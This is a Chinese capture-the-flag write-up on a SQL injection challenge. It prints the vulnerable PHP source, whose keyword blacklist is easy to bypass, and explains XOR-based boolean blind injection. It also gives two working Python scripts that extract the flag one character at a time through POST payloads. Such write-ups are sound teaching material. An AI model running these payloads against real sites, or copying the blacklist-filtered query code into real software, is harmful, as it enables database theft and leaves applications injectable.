[huayang]
我们先进去看看
sql注入并且给出了表和列名
测试一下注入语句
有过滤,在网上看见一份源代码可以参照参照
<?php
$dbuser='root';
$dbpass='root';
function safe($sql){
#被过滤的内容 函数基本没过滤
$blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
foreach($blackList as $blackitem){
if(stripos($sql,$blackitem)){
return False;
}
}
return True;
}
if(isset($_POST['id'])){
$id = $_POST['id'];
}else{
die();
}
$db = mysql_connect("localhost",$dbuser,$dbpass);
if(!$db){
die(mysql_error());
}
mysql_select_db("ctf",$db);
if(safe($id)){
$query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
if($query){
$result = mysql_fetch_array($query);
if($result){
echo $result['content'];
}else{
echo "Error Occured When Fetch Result.";
}
}else{
var_dump($query);
}
}else{
die("SQL Injection Checked.");
}
可以看到过滤包括’ ‘,’||’,’#’,’-‘,’;’,’&’,’+’,’or’,’and’,’`’,'”‘,’insert’,’group’,’limit’,’update’,’delete’,’*’,’into’,’union’,’load_file’,’outfile’,’./’
在有源码的情况下可知道进行异或注入1^1^1
如果没有源码的情况下,,,问就是sqlmap(都出不来)哎,做不来
咱们继续用数字去试回显
分别输入1,2,3,4看看有什么
可以发现只有 1 or 2 成功
可以知道true=Hello, glzjin wants a girlfriend. false=Error Occured When Fetch Result.
这是不是和我们以前遇到的技能树里的盲注很像
只不过这里多了一层过滤
用py构建payload
记得这是post形式哦
import requests
url = 'http://challenge-01371bacd7f1655e.sandbox.ctfhub.com:10080/index.php'
true = 'Hello, glzjin wants a girlfriend.'
flag = ''
for number in range(1,50):
for ascii in range(48,126):
payload = '1^(ascii(substr((select(flag)from(flag)),' + str(number) + ',1))>' + str(ascii) + ')'
response = requests.post(url, data={'id': payload})
if true in response.text:
flag += chr(ascii)
print(flag)
break
print('\n>>>flag=',flag,'<<<\n')
我写的这个便于理解
再贴个dalao写的,速度相对更快,但理解起来也更加有难度
import requests
url='http://challenge-01371bacd7f1655e.sandbox.ctfhub.com:10080/index.php'
flag = ''
for i in range(1,50):
max = 127
min = 0
for c in range(0,127):
s = (int)((max+min)/2)
payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
r = requests.post(url,data = {'id':payload})
if 'Hello, glzjin wants a girlfriend.' in str(r.content):
max=s
else:
min=s
if((max-min)<=1):
flag+=chr(max)
print(flag)
break
print(flag)删了一些无用的代码但逻辑性还是很强
可能这就是dalao吧
[/huayang]
FROM:浅浅淡淡[hellohy]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论